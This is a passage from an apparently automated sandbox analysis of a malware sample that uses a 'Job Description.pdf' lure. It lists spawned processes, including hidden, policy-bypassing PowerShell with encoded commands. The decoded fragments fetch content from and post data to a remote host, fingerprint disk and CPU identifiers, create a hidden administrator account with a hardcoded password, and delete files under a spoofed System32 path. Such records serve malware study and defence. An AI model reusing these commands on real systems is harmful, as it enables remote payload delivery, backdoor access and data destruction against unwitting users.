sAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgADJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES421C.tmp" "c:\Users\user\AppData\Local\Temp\pkwqtvat\CSC14ED126C80BF4A239EEB93A187C6F14.TMP"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\Job Description.pdf"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AMwA3AGUAMgBhADUANwA2ADcAOAAxAGYANgAwAGUAYQBlAGEANQA1AGUAMwA3ADkAYgBlADYAYQBlADAAMAA3ADcANgA0ADEAYgAzADkAZgA1ADkAMAA3ADkAMgA0AGQAOAA1ADIANAAyADQAMQBlADIAOQBiADcAYQA1ADMAYQA2ADEAMwBiADMAZAAzADcAZgA5ADAAZQAwADAANQBlADEAMQBiADkANgBkADYAMQAxADcANgAyADkAMAA0ADYAOQA5ADAAYwAxAGQAZgA3ADkAYQBhADkANwAzADUAMgA4ADkAMwAwADgAYwAxAGIAMgBmAGEAOQBlAGQAZQBlAGEANABkAGMANQBmAGUANQBhADAAOQBiAGYAOQBiADIANwA3ADMAZQBlAGEAZgA5ADAAOQA1ADAAYgA2ADkANgBmAGUAMQAwAGMAYwA5AGQAYgAzADcANAA1AGIANQAxADUAMQBlADQAYgAwADAAMABhADcAOQAxADIAMQAzAGMAZgA5ADMAZgAyADUAMAA3ADAAZgA1ADgAOQBiADQAMABmAGQAMwBlADMAOQBjADQAYQAxADgAZQBkAGEAZAAyACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGJump to behavior
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \"
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min "" powershell.exe -windowstyle hidden -nologo -noprofile -executionpolicy bypass -encodedcommand jab1ahiaaqagad0aiaaiaggadab0ahaacwa6ac8alwbragkabgbnahmabqbhagsazqbyac4aywbhac8azgbpagwazqayac8amwa3aguamgbhaduanwa2adcaoaaxagyangawaguayqblageanqa1aguamwa3adkaygbladyayqbladaamaa3adcanga0adeaygazadkazga1adkamaa3adkamga0agqaoaa1adianaayadqamqbladiaoqbiadcayqa1admayqa2adeamwbiadmazaazadcazga5adaazqawadaanqbladeamqbiadkangbkadyamqaxadcangayadkamaa0adyaoqa5adaaywaxagqazga3adkayqbhadkanwazaduamga4adkamwawadgaywaxagiamgbmageaoqblagqazqblageanabkagmanqbmaguanqbhadaaoqbiagyaoqbiadianwa3admazqblageazga5adaaoqa1adaayga2adkangbmaguamqawagmaywa5agqaygazadcanaa1agianqaxaduamqbladqaygawadaamabhadcaoqaxadiamqazagmazga5admazgayaduamaa3adaazga1adgaoqbiadqamabmagqamwbladmaoqbjadqayqaxadgazqbkageazaayaciaowanaaoajabjag8adqbuahqaiaa9acaamqawadaaowanaaoadqakaa0acganaaoazgb1ag4aywb0agkabwbuacaauwblag4azaagahsadqakacaaiaagacaacabhahiayqbtacgaiabbafaauwbpagiaagblagmadabdacaajabsag8azwbnahmazwagackadqakaa0acgagacaaiaagacmaiabdag8abgb2aguacgb0acaaygbvagqaeqagahqabwagahmadabyagkabgbnaa0acgagacaaiaagacqacwb0ahiaaqbuagcaqgbvagqaeqagad0aiabbahmadabyagkabgbnaf0akaakagwabwbnae0acwbnacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abgapadsadqakacaaiaagacaajabsag8azwbnaguacwbzageazwblahmaiaa9acaaqaaoackaowanaaoaiaagacaaiaakagwabwbnae0azqbzahmayqbnaguacwagacsapqagacqacwb0ahiaaqbuagcaqgbvagqaeqa7aa0acgagacaaiaagacqababvagcatqblahmacwbhagcazqbzacaakwa9acaaigatac0alqatac0alqatac0alqataciaowanaaoadqakacaaiaagacaajaboaguayqbkaguacgbzacaapqagaeaaewb9adsadqakacaaiaagacaajabraguaeqagad0aiaaiaemabwbuahqazqbuahqalqbuahkacablaciaowanaaoaiaagacaaiaakahyayqbsahuazqagad0aiaaiageacabwagwaaqbjageadabpag8abgavagoacwbvag4aiga7aa0acganaaoaiaagacaaiaakaggazqbhagqazqbyahmawwakagsazqb5af0aiaa9acaajab2ageabab1aguaowanaaoaiaagacaaiaakahuacgbpacaapqagaciatabpaecavqbsaewaiga7aa0acgagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabiag8azab5acaapqagacqababvagcatqblahmacwbhagcazqbzacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abga7aa0acgagacaaiaagacaaiaagacaaiaagacaaiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0atqblahqaaabvagqaiabqag8acwb0acaalqbiaguayqbkaguacgbzacaajaboaguayqbkaguacgbzacaalqbcag8azab5acaajabiag8azab5aa0acgagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagagmayqb0agmaaab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaanaaoaiaagacaaiaagacaaiaagah0adqakacaaiaagacaadqakah0adqakaa0acgb3aggaaqbsaguakaakagmabwb1ag4adaagac0azwb0acaamaapaa0acgb7aa0acgajaa0acgajahqacgb5ahsadqakacaaiaagacaaiaagacaaiabtaguabgbkacaaigbiaguazwbpag4aiabkag8adwbuagwabwbhagqaiaakahuacgbpaciaowanaaoacqajacqaywbvag4adablag4adaagad0aiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0avqbzaguaqgbhahmaaqbjafaayqbyahmaaqbuagcaowanaaoaiaagacaaiaagacaaiaagacqaygb5ahqazqbbahiacgbhahkaiaa9acaajabjag8abgb0aguabgb0ac4aywbvag4adablag4adaa7aa0acgagacaaiaagacaaiaagacaazgbvahiaiaaoacqaaqagad
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -nologo -noprofile -executionpolicy bypass -encodedcommand jab1ahiaaqagad0aiaaiaggadab0ahaacwa6ac8alwbragkabgbnahmabqbhagsazqbyac4aywbhac8azgbpagwazqayac8amwa3aguamgbhaduanwa2adcaoaaxagyangawaguayqblageanqa1aguamwa3adkaygbladyayqbladaamaa3adcanga0adeaygazadkazga1adkamaa3adkamga0agqaoaa1adianaayadqamqbladiaoqbiadcayqa1admayqa2adeamwbiadmazaazadcazga5adaazqawadaanqbladeamqbiadkangbkadyamqaxadcangayadkamaa0adyaoqa5adaaywaxagqazga3adkayqbhadkanwazaduamga4adkamwawadgaywaxagiamgbmageaoqblagqazqblageanabkagmanqbmaguanqbhadaaoqbiagyaoqbiadianwa3admazqblageazga5adaaoqa1adaayga2adkangbmaguamqawagmaywa5agqaygazadcanaa1agianqaxaduamqbladqaygawadaamabhadcaoqaxadiamqazagmazga5admazgayaduamaa3adaazga1adgaoqbiadqamabmagqamwbladmaoqbjadqayqaxadgazqbkageazaayaciaowanaaoajabjag8adqbuahqaiaa9acaamqawadaaowanaaoadqakaa0acganaaoazgb1ag4aywb0agkabwbuacaauwblag4azaagahsadqakacaaiaagacaacabhahiayqbtacgaiabbafaauwbpagiaagblagmadabdacaajabsag8azwbnahmazwagackadqakaa0acgagacaaiaagacmaiabdag8abgb2aguacgb0acaaygbvagqaeqagahqabwagahmadabyagkabgbnaa0acgagacaaiaagacqacwb0ahiaaqbuagcaqgbvagqaeqagad0aiabbahmadabyagkabgbnaf0akaakagwabwbnae0acwbnacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abgapadsadqakacaaiaagacaajabsag8azwbnaguacwbzageazwblahmaiaa9acaaqaaoackaowanaaoaiaagacaaiaakagwabwbnae0azqbzahmayqbnaguacwagacsapqagacqacwb0ahiaaqbuagcaqgbvagqaeqa7aa0acgagacaaiaagacqababvagcatqblahmacwbhagcazqbzacaakwa9acaaigatac0alqatac0alqatac0alqataciaowanaaoadqakacaaiaagacaajaboaguayqbkaguacgbzacaapqagaeaaewb9adsadqakacaaiaagacaajabraguaeqagad0aiaaiaemabwbuahqazqbuahqalqbuahkacablaciaowanaaoaiaagacaaiaakahyayqbsahuazqagad0aiaaiageacabwagwaaqbjageadabpag8abgavagoacwbvag4aiga7aa0acganaaoaiaagacaaiaakaggazqbhagqazqbyahmawwakagsazqb5af0aiaa9acaajab2ageabab1aguaowanaaoaiaagacaaiaakahuacgbpacaapqagaciatabpaecavqbsaewaiga7aa0acgagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabiag8azab5acaapqagacqababvagcatqblahmacwbhagcazqbzacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abga7aa0acgagacaaiaagacaaiaagacaaiaagacaaiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0atqblahqaaabvagqaiabqag8acwb0acaalqbiaguayqbkaguacgbzacaajaboaguayqbkaguacgbzacaalqbcag8azab5acaajabiag8azab5aa0acgagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagagmayqb0agmaaab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaanaaoaiaagacaaiaagacaaiaagah0adqakacaaiaagacaadqakah0adqakaa0acgb3aggaaqbsaguakaakagmabwb1ag4adaagac0azwb0acaamaapaa0acgb7aa0acgajaa0acgajahqacgb5ahsadqakacaaiaagacaaiaagacaaiabtaguabgbkacaaigbiaguazwbpag4aiabkag8adwbuagwabwbhagqaiaakahuacgbpaciaowanaaoacqajacqaywbvag4adablag4adaagad0aiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0avqbzaguaqgbhahmaaqbjafaayqbyahmaaqbuagcaowanaaoaiaagacaaiaagacaaiaagacqaygb5ahqazqbbahiacgbhahkaiaa9acaajabjag8abgb0aguabgb0ac4aywbvag4adablag4adaa7aa0acgagacaaiaagacaaiaagacaazgbvahiaiaaoacqaaqagad0aiaawadsaiaakag
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nologo -noprofile -windowstyle hidden -executionpolicy bypass -encodedcommand zgb1ag4aywb0agkabwbuacaarwblahqalqbjagqazqbuahqaaqb0ahkaewakacaaiaagacaajaboageacgbkaeqacgbpahyazqbzacaapqagaecazqb0ac0avwbtagkatwbiagoazqbjahqaiaataemababhahmacwagafcaaqbuadmamgbfaeqaaqbzagsarabyagkadgblacaafaagafcaaablahiazqatae8aygbqaguaywb0acaaewagacqaxwauae0azqbkagkayqbuahkacablacaalqblaheaiaaiaeyaaqb4aguazaagaggayqbyagqaiabkagkacwbracaabqblagqaaqbhaciaiaatag8acgagacqaxwauae0azqbkagkayqbuahkacablacaalqblaheaiaaiaeyaaqb4aguazaagaggayqbyagqaiabkagkacwbracaabqblagqaaqbhacaalqagafmauwbeaciaiab9aaoajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaa9acaaqaaoackacgbmag8acgblageaywboacaakaakaggayqbyagqarabyagkadgblacaaaqbuacaajaboageacgbkaeqacgbpahyazqbzackaiab7aaoaiaagacaaiaakahmazqbyagkayqbsae4adqbtagiazqbyacaapqagacqaaabhahiazabeahiaaqb2agualgbtaguacgbpageababoahuabqbiaguacgakacaaiaagacaajabtag8azablagwaiaa9acaajaboageacgbkaeqacgbpahyazqauae0abwbkaguabaakacaaiaagacaajabkahiaaqb2aguasqbuagyabwagad0aiaaiafmazqbyagkayqbsacaatgb1ag0aygblahiaogagacqacwblahiaaqbhagwatgb1ag0aygblahialaagae0abwbkaguabaa6acaajabtag8azablagwaigakacaaiaagacaajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaarad0aiaakagqacgbpahyazqbjag4azgbvaaoafqakacqaywbvag0aygbpag4azqbkaekabgbmag8aiaa9acaajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaatagoabwbpag4aiaaiagaacgbgag4aigakacqaywbwahuasqbuagyabwagad0aiabhaguadaatafcabqbpae8aygbqaguaywb0acaalqbdagwayqbzahmaiabxagkabgazadiaxwbqahiabwbjaguacwbzag8acgakacqaywbwahuarablahqayqbpagwacwagad0aiaaiafaacgbvagmazqbzahmabwbyaekazaa6acaajaaoacqaywbwahuasqbuagyabwauafaacgbvagmazqbzahmabwbyaekazaapacwaiaboageabqbladoaiaakacgajabjahaadqbjag4azgbvac4atgbhag0azqapacwaiabnageaeabdagwabwbjagsauwbwaguazqbkadoaiaakacgajabjahaadqbjag4azgbvac4atqbhahgaqwbsag8aywbrafmacablaguazaapacwaiabvag4aaqbxahuazqbjagqaogagacqakaakagmacab1aekabgbmag8algbvag4aaqbxahuazqbjagqakqaiaaoajabhagwababjag4azgbvacaapqagaciajabjag8abqbiagkabgblagqasqbuagyabwbgahiayabuacqaywbwahuarablahqayqbpagwacwaiaaoajabtagqanqagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbtaguaywb1ahiaaqb0ahkalgbdahiaeqbwahqabwbnahiayqbwaggaeqauae0araa1aemacgb5ahaadabvafmazqbyahyaaqbjaguauabyag8adgbpagqazqbyaaoajabiahkadablahmaiaa9acaawwbtahkacwb0aguabqauafqazqb4ahqalgbfag4aywbvagqaaqbuagcaxqa6adoavqbuaeyaoaauaecazqb0aeiaeqb0aguacwaoacqayqbsagwasqbuagyabwapaaoajaboageacwboaeiaeqb0aguacwagad0aiaakag0azaa1ac4aqwbvag0acab1ahqazqbiageacwboacgajabiahkadablahmakqakacqaaabhahmaaaagad0aiabbaeiaaqb0aemabwbuahyazqbyahqazqbyaf0aoga6afqabwbtahqacgbpag4azwaoacqaaabhahmaaabcahkadablahmakqagac0acgblahaababhagmazqagaccalqanaaoaiaagacaaiabyaguadab1ahiabgagacqaaabhahmaaaa7aaoafqakagmazaagaciaqwa6afwavwbpag4azabvahcacwbcafqazqbtahaaiga7aaoajab0aguacwb0acaapqagaecazqb0ac0asqbkaguabgb0agkadab5adsacgakahqazqbzahqaiab8acaatwb1ahqalqbgagkabablacaalqbgagkabablafaayqb0aggaiaaiagqazqb2agkaywblaekazaauahqaeab0aciaiaataeuabgbjag8azabpag4azwagafuavabgadga
